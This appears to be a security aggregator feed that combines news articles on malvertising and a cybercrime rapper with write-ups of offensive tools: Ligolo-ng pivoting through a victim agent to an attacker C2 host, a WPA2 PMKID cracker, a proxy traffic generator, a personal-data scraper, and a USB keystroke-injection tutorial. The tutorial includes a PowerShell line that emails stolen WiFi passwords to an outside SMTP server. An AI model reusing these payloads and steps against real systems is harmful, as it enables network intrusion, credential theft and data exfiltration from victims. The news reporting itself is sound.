    • Implementation of taint analysis. Example use case: a user can pass a pull request title (a controllable parameter) to an action parameter named data. That action parameter may then be used in a run command, e.g. - run: echo ${{ inputs.data }}, which creates a path to code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it does, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



    Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

    By: Zion3R


    Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS).


    Features

    • Tun interface (No more SOCKS!)
    • Simple UI with agent selection and network information
    • Easy to use and setup
    • Automatic certificate configuration with Let's Encrypt
    • Performant (Multiplexing)
    • Does not require high privileges
    • Socket listening/binding on the agent
    • Multiple platforms supported for the agent

    How is this different from Ligolo/Chisel/Meterpreter... ?

    Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

    When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

    As an example, for a TCP connection:

    • SYN packets are translated to a connect() on the remote host
    • A SYN-ACK is sent back if connect() succeeds
    • An RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED is returned after connect()
    • Nothing is sent on timeout

    This allows running tools like nmap without the use of proxychains (simpler and faster).
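
    A rough Python sketch of that translation logic is shown below. It is purely conceptual (Ligolo-ng's real implementation is the Gvisor userland stack written in Go): an intercepted SYN for a destination becomes a connect() attempt, and the outcome decides whether a SYN-ACK, an RST, or nothing would be sent back.

    import socket

    def translate_syn(dst_ip, dst_port, timeout=3.0):
        # Map an intercepted SYN to a TCP connect() on the remote side.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((dst_ip, dst_port))
            return "SYN-ACK"      # connect() succeeded
        except (ConnectionRefusedError, ConnectionResetError, ConnectionAbortedError):
            return "RST"          # ECONNREFUSED / ECONNRESET / ECONNABORTED
        except socket.timeout:
            return None           # no reply on timeout
        finally:
            s.close()

    print(translate_syn("192.168.0.30", 80))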

    Building & Usage

    Precompiled binaries

    Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

    Building Ligolo-ng

    Building ligolo-ng (Go >= 1.20 is required):

    $ go build -o agent cmd/agent/main.go
    $ go build -o proxy cmd/proxy/main.go
    # Build for Windows
    $ GOOS=windows go build -o agent.exe cmd/agent/main.go
    $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

    Setup Ligolo-ng

    Linux

    When using Linux, you need to create a tun interface on the Proxy Server (C2):

    $ sudo ip tuntap add user [your_username] mode tun ligolo
    $ sudo ip link set ligolo up

    Windows

    You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

    Running Ligolo-ng proxy server

    Start the proxy server on your Command and Control (C2) server (default port 11601):

    $ ./proxy -h # Help options
    $ ./proxy -autocert # Automatically request LetsEncrypt certificates

    TLS Options

    Using Let's Encrypt Autocert

    When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

    Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

    Using your own TLS certificates

    If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

    Automatic self-signed certificates (NOT RECOMMENDED)

    The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

    The -ignore-cert option needs to be used with the agent.

    Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

    Using Ligolo-ng

    Start the agent on your target (victim) computer (no privileges are required!):

    $ ./agent -connect attacker_c2_server.com:11601

    If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

    A session should appear on the proxy server.

    INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

    Use the session command to select the agent.

    ligolo-ng » session 
    ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

    Display the network configuration of the agent using the ifconfig command:

    [Agent : nchatelain@nworkstation] » ifconfig 
    [...]
    ┌─────────────────────────────────────────────┐
    │ Interface 3 │
    ├──────────────┬──────────────────────────────┤
    │ Name │ wlp3s0 │
    │ Hardware MAC │ de:ad:be:ef:ca:fe │
    │ MTU │ 1500 │
    │ Flags │ up|broadcast|multicast │
    │ IPv4 Address │ 192.168.0.30/24 │
    └──────────────┴──────────────────────────────┘

    Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

    Linux:

    $ sudo ip route add 192.168.0.0/24 dev ligolo

    Windows:

    > netsh int ipv4 show interfaces

    Idx     Met          MTU          State        Name
    --- ---------- ---------- ------------ ---------------------------
    25 5 65535 connected ligolo

    > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

    Start the tunnel on the proxy:

    [Agent : nchatelain@nworkstation] » start
    [Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

    You can now access the 192.168.0.0/24 agent network from the proxy server.

    $ nmap 192.168.0.0/24 -v -sV -n
    [...]
    $ rdesktop 192.168.0.123
    [...]

    Agent Binding/Listening

    You can listen to ports on the agent and redirect connections to your control/proxy server.

    In a ligolo session, use the listener_add command.

    The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

    [Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
    INFO[1208] Listener created on remote agent!

    On the proxy:

    $ nc -lvp 4321

    When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

    This is very useful when using reverse tcp/udp payloads.

    You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

    [Agent : nchatelain@nworkstation] » listener_list 
    ┌───────────────────────────────────────────────────────────────────────────────┐
    │ Active listeners │
    ├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
    │ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
    ├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
    │ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
    └───┴─────────────────────────┴────────────────────────┴────────────────────────┘

    [Agent : nchatelain@nworkstation] » listener_stop 0
    INFO[1505] Listener closed.

    Demo

    ligolo-ng_demo.mp4

    Does it require Administrator/root access ?

    On the agent side, no! Everything can be performed without administrative access.

    However, on your relay/proxy server, you need to be able to create a tun interface.

    Supported protocols/packets

    • TCP
    • UDP
    • ICMP (echo requests)

    Performance

    You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

    $ iperf3 -c 10.10.0.1 -p 24483
    Connecting to host 10.10.0.1, port 24483
    [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
    [ ID] Interval Transfer Bitrate Retr Cwnd
    [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
    [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
    [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
    [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
    [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
    [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
    [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
    [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
    [ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
    [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
    - - - - - - - - - - - - - - - - - - - - - - - - -
    [ ID] Interval Transfer Bitrate Retr
    [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
    [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

    Caveats

    Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

    When using nmap, you should use --unprivileged or -PE to avoid false positives.

    Todo

    • Implement other ICMP error messages (this will speed up UDP scans) ;
    • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
    • Add mTLS support.

    Credits

    • Nicolas Chatelain <nicolas -at- chatelain.me>


    Perfecting the Defense-in-Depth Strategy with Automation

    Medieval castles stood as impregnable fortresses for centuries, thanks to their meticulous design. Fast forward to the digital age, and this medieval wisdom still echoes in cybersecurity. Like castles with strategic layouts to withstand attacks, the Defense-in-Depth strategy is the modern counterpart — a multi-layered approach with strategic redundancy and a blend of passive and active security

    Using Google Search to Find Software Can Be Risky

    Google continues to struggle with cybercriminals running malicious ads on its search platform to trick people into downloading booby-trapped copies of popular free software applications. The malicious ads, which appear above organic search results and often precede links to legitimate sources of the same software, can make searching for software on Google a dicey affair.

    Google says keeping users safe is a top priority, and that the company has a team of thousands working around the clock to create and enforce their abuse policies. And by most accounts, the threat from bad ads leading to backdoored software has subsided significantly compared to a year ago.

    But cybercrooks are constantly figuring out ingenious ways to fly beneath Google’s anti-abuse radar, and new examples of bad ads leading to malware are still too common.

    For example, a Google search earlier this week for the free graphic design program FreeCAD produced the following result, which shows that a “Sponsored” ad at the top of the search results is advertising the software available from freecad-us[.]org. Although this website claims to be the official FreeCAD website, that honor belongs to the result directly below — the legitimate freecad.org.

    How do we know freecad-us[.]org is malicious? A review at DomainTools.com shows this domain is the newest (registered Jan. 19, 2024) of more than 200 domains at the Internet address 93.190.143[.]252 that are confusingly similar to popular software titles, including dashlane-project[.]com, filezillasoft[.]com, keepermanager[.]com, and libreofficeproject[.]com.

    Some of the domains at this Netherlands host appear to be little more than software review websites that steal content from established information sources in the IT world, including Gartner, PCWorld, Slashdot and TechRadar.

    Other domains at 93.190.143[.]252 do serve actual software downloads, but none of them are likely to be malicious if one visits the sites through direct navigation. If one visits openai-project[.]org and downloads a copy of the popular Windows desktop management application Rainmeter, for example, the file that is downloaded has the same exact file signature as the real Rainmeter installer available from rainmeter.net.

    But this is only a ruse, says Tom Hegel, principal threat researcher at the security firm Sentinel One. Hegel has been tracking these malicious domains for more than a year, and he said the seemingly benign software download sites will periodically turn evil, swapping out legitimate copies of popular software titles with backdoored versions that will allow cybercriminals to remotely commandeer the systems.

    “They’re using automation to pull in fake content, and they’re rotating in and out of hosting malware,” Hegel said, noting that the malicious downloads may only be offered to visitors who come from specific geographic locations, like the United States. “In the malicious ad campaigns we’ve seen tied to this group, they would wait until the domains gain legitimacy on the search engines, and then flip the page for a day or so and then flip back.”

    In February 2023, Hegel co-authored a report on this same network, which Sentinel One has dubbed MalVirt (a play on “malvertising”). They concluded that the surge in malicious ads spoofing various software products was directly responsible for a surge in malware infections from infostealer trojans like IcedID, Redline Stealer, Formbook and AuroraStealer.

    Hegel noted that the spike in malicious software-themed ads came not long after Microsoft started blocking by default Office macros in documents downloaded from the Internet. He said the volume of the current malicious ad campaigns from this group appears to be relatively low compared to a year ago.

    “It appears to be same campaign continuing,” Hegel said. “Last January, every Google search for ‘Autocad’ led to something bad. Now, it’s like they’re paying Google to get one out of every dozen of searches. My guess it’s still continuing because of the up-and-down [of the] domains hosting malware and then looking legitimate.”

    Several of the websites at this Netherlands host (93.190.143[.]252) are currently blocked by Google’s Safebrowsing technology, and labeled with a conspicuous red warning saying the website will try to foist malware on visitors who ignore the warning and continue.

    But it remains a mystery why Google has not similarly blocked the more than 240 other domains at this same host, or else removed them from its search index entirely, especially considering there is nothing else but these domains hosted at that Netherlands IP address, and that they have all remained at that address for the past year.

    In response to questions from KrebsOnSecurity, Google said maintaining a safe ads ecosystem and keeping malware off of its platforms is a priority across Google.

    “Bad actors often employ sophisticated measures to conceal their identities and evade our policies and enforcement, sometimes showing Google one thing and users something else,” Google said in a written statement. “We’ve reviewed the ads in question, removed those that violated our policies, and suspended the associated accounts. We’ll continue to monitor and apply our protections.”

    Google says it removed 5.2 billion ads in 2022, and restricted more than 4.3 billion ads and suspended over 6.7 million advertiser accounts. The company’s latest ad safety report says Google in 2022 blocked or removed 1.36 billion advertisements for violating its abuse policies.

    Some of the domains referenced in this story were included in Sentinel One’s February 2023 report, but dozens more have been added since, such as those spoofing the official download sites for Corel Draw, Github Desktop, Roboform and Teamviewer.

    This October 2023 report on the FreeCAD user forum came from a user who reported downloading a copy of the software from freecadsoft[.]com after seeing the site promoted at the top of a Google search result for “freecad.” Almost a month later, another FreeCAD user reported getting stung by the same scam.

    “This got me,” FreeCAD forum user “Matterform” wrote on Nov. 19, 2023. “Please leave a report with Google so it can flag it. They paid Google for sponsored posts.”

    Sentinel One’s report didn’t delve into the “who” behind this ongoing MalVirt campaign, and there are precious few clues that point to attribution. All of the domains in question were registered through webnic.cc, and several of them display a placeholder page saying the site is ready for content. Viewing the HTML source of these placeholder pages shows many of the hidden comments in the code are in Cyrillic.

    Trying to track the crooks using Google’s Ad Transparency tools didn’t lead far. The ad transparency record for the malicious ad featuring freecad-us[.]org (in the screenshot above) shows that the advertising account used to pay for the ad has only run one previous ad through Google search: It advertised a wedding photography website in New Zealand.

    The apparent owner of that photography website did not respond to requests for comment, but it’s also likely his Google advertising account was hacked and used to run these malicious ads.

    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
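
    The core technique is simple to reproduce. The sketch below (a generic illustration, not Uscrapper's own code) fetches a page with requests and pulls out e-mail addresses with a regular expression:

    import re
    import requests

    EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

    def extract_emails(url):
        # Fetch the page and return the unique e-mail addresses found in its body.
        resp = requests.get(url, timeout=10)
        return sorted(set(EMAIL_RE.findall(resp.text)))

    print(extract_emails("https://example.com"))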


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers and usernames.

    Whats New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-web-scraping techniques.
    • Introduced Crawl and Scrape: an advanced crawl-and-scrape module to scrape websites from within.
    • Implemented multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    E-Crime Rapper ‘Punchmade Dev’ Debuts Card Shop

    The rapper and social media personality Punchmade Dev is perhaps best known for his flashy videos singing the praises of a cybercrime lifestyle. With memorable hits such as “Internet Swiping” and “Million Dollar Criminal” earning millions of views, Punchmade has leveraged his considerable following to peddle tutorials on how to commit financial crimes online. But until recently, there wasn’t much to support a conclusion that Punchmade was actually doing the cybercrime things he promotes in his songs.

    Images from Punchmade Dev’s Twitter/X account show him displaying bags of cash and wearing a functional diamond-crusted payment card skimmer.

    Punchmade Dev’s most controversial mix — a rap called “Wire Fraud Tutorial” — was taken down by Youtube last summer for violating the site’s rules. Punchmade shared on social media that the video’s removal was prompted by YouTube receiving a legal process request from law enforcement officials.

    The 24-year-old rapper told reporters he wasn’t instructing people how to conduct wire fraud, but instead informing his fans on how to avoid being victims of wire fraud. However, this is difficult to discern from listening to the song, which sounds very much like a step-by-step tutorial on how to commit wire fraud.

    “Listen up, I’m finna show y’all how to hit a bank,” Wire Fraud Tutorial begins. “Just pay attention, this is a quick way to jug in any state. First you wanna get a bank log from a trusted site. Do your research because the information must be right.”

    And even though we’re talking about an individual who regularly appears in videos wearing a half-million dollars worth of custom jewelry draped around his arm and neck (including the functional diamond-encrusted payment card skimming device pictured above), there’s never been much evidence that Punchmade was actually involved in committing cybercrimes himself. Even his most vocal critics acknowledged that the whole persona could just be savvy marketing.

    That changed recently when Punchmade’s various video and social media accounts began promoting a new web shop that is selling stolen payment cards and identity data, as well as hacked financial accounts and software for producing counterfeit checks.

    Punchmade Dev's shop.

    Punchmade Dev’s shop.

    The official Punchmadedev account on Instagram links to many of the aforementioned rap videos and tutorials on cybercriming, as well as to Punchmadedev’s other profiles and websites. Among them is mainpage[.]me/punchmade, which includes the following information for “Punchmade Empire ®”:

    -212,961 subscribers

    #1 source on Telegram

    Contact: @whopunchmade

    24/7 shop: https://punchmade[.]atshop[.]io

    Visiting that @whopunchmade Telegram channel shows this user is promoting punchmade[.]atshop[.]io, which is currently selling hacked bank accounts and payment cards with high balances.

    Clicking “purchase” on the C@sh App offering, for example, shows that for $80 the buyer will receive logins to Cash App accounts with balances between $3,000 and $5,000. “If you buy this item you’ll get my full support on discord/telegram if there is a problem!,” the site promises. Purchases can be made in cryptocurrencies, and checking out prompts one to continue payment at Coinbase.com.

    Another item for sale, “Fullz + Linkable CC,” promises “ID Front + Back, SSN with 700+ Credit Score, and Linkable CC” or credit card. That also can be had for $80 in crypto.

    WHO IS PUNCHMADE DEV?

    Punchmade has fashioned his public persona around a collection of custom-made, diamond-covered necklaces that are as outlandish and gaudy as they are revelatory. My favorite shot from one of Punchmade’s videos features at least three of these monstrosities: One appears to be a boring old diamond and gold covered bitcoin, but the other two necklaces tell us something about where Punchmade is from:

    Notice the University of Kentucky logo, and the Lexington, Ky skyline.

    One of them includes the logo and mascot of the University of Kentucky. The other, an enormous diamond studded skyline, appears to have been designed based on the skyline in Lexington, Ky:

    The “About” page on Punchmade Dev’s Spotify profile describes him as “an American artist, rapper, musician, producer, director, entrepreneur, actor and investor.” “Punchmade Dev is best known for his creative ways to use technology, video gaming, and social media to build a fan base,” the profile continues.

    The profile explains that he launched his own record label in 2021 called Punchmade Records, where he produces his own instrumentals and edits his own music videos.

    A search on companies that include the name “punchmade” at the website of the Kentucky Secretary of State brings up just one record: OBN Group LLC, in Lexington, Ky. This November 2021 record includes a Certificate of Assumed Name, which shows that Punchmade LLC is the assumed name of OBN Group LLC.

    The president of OBN Group LLC is listed as Devon Turner. A search on the Secretary of State website for other businesses tied to Devon Turner reveals just one other record: A now-defunct entity called DevTakeFlightBeats Inc.

    The breach tracking service Constella Intelligence finds that Devon Turner from Lexington, Ky. used the email address obndevpayments@gmail.com. A lookup on this email at DomainTools.com shows it was used to register the domain foreverpunchmade[.]com, which is registered to a Devon Turner in Lexington, Ky. A copy of this site at archive.org indicates it once sold Punchmade Dev-branded t-shirts and other merchandise.

    Mr. Turner did not respond to multiple requests for comment.

    Searching online for Devon Turner and “Punchmade” brings up a video from @brainjuiceofficial, a YouTube channel that focuses on social media celebrities. @Brainjuiceofficial says Turner was born in October 2000, the oldest child of a single mother of five whose husband was not in the picture.

    Devon Turner, a.k.a. “Punchmade Dev,” in an undated photo.

    The video says the six-foot five Turner played basketball, track and football in high school, but that he gradually became obsessed with playing the video game NBA 2K17 and building a following of people watching him play the game competitively online.

    According to this brief documentary, Turner previously streamed his NBA 2K17 videos on a YouTube channel called DevTakeFlight, although he originally went by the nickname OBN Dev.

    “Things may eventually catch up to Devon if he isn’t careful,” @Brainjuiceofficial observed, noting that Turner has been shot at before, and also robbed at an ATM while flexing a bunch of cash for a picture and wearing $500k in jewelry. “Although you have a lot of people that are into what you do, there are a lot of people waiting for you to slip up.”

    Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

    By: Zion3R


    This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


    Program Usage

    python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

    NOTE: apmac, clientmac, pmkid must be a hexstring, e.g. b8621f50edd9

    How PMKID is Calculated

    The two main formulas to obtain a PMKID are as follows:

    1. Pairwise Master Key (PMK) calculation: PMK = PBKDF2(HMAC-SHA1, passphrase, salt = ssid, 4096 iterations)
    2. PMKID calculation: PMKID = HMAC-SHA1(PMK, "PMK Name" + bssid + clientmac), truncated to the first 128 bits

    This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
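
    For reference, the same math can be reproduced with the Python standard library. This is a standalone sketch, not the tool's find_pw_chunk/calculate_pmkid code, and the passphrase, SSID and MAC values below are made up for the example.

    import hashlib
    import hmac

    def calc_pmkid(passphrase, ssid, ap_mac_hex, client_mac_hex):
        # PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations.
        pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
        # PMKID: first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC).
        data = b"PMK Name" + bytes.fromhex(ap_mac_hex) + bytes.fromhex(client_mac_hex)
        return hmac.new(pmk, data, hashlib.sha1).hexdigest()[:32]

    print(calc_pmkid("password123", "MyWiFi", "b8621f50edd9", "aabbccddeeff"))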

    Obtaining the PMKID

    Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

    *You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

    To obtain the PMKID manually from Wireshark, put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture EAPOL message 1 of the handshake. Follow the next three steps to obtain the fields needed for the arguments.

    Open the pcap in WireShark:

    • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
    • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
    • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

    If the access point is vulnerable, you should see the PMKID value as in the screenshot below:

    Demo Run

    Disclaimer

    This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



    New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms

    A new Python-based hacking tool called FBot has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio. “Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various

    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
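
    Conceptually, each request only differs in the proxies mapping handed to requests. Below is a minimal sketch (not the tool's exact code) that fetches a page through one proxy from proxies.txt and collects the links on it:

    import requests
    from bs4 import BeautifulSoup

    def fetch_links(url, proxy):
        # proxy uses the ip:port format from proxies.txt, e.g. "50.168.163.176:80".
        proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
        resp = requests.get(url, proxies=proxies, timeout=10)
        soup = BeautifulSoup(resp.text, "html.parser")
        return [a["href"] for a in soup.find_all("a", href=True)]

    print(fetch_links("https://example.com", "50.168.163.176:80"))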

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

    Get new proxies (with port) and add them to proxies.txt in this format: 50.168.163.176:80
    • You can get them from here: https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them before adding.

    How to Use:

    1. Clone the repository:
    git clone https://github.com/spyboy-productions/PhantomCrawler.git
    2. Install dependencies:
    pip3 install -r requirements.txt
    3. Run the script:
    python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

    If you find this GitHub repo useful, please consider giving it a star! 



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


    Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

     

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

    • The victim's computer has to have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of those keyboard keys.

    Delays

    We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. A delay is also useful at the very beginning, when a new USB device is connected to the targeted computer: the computer must first complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it using encryption or compression to avoid detection while sending it over the network. The two most common ways of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

    Note:

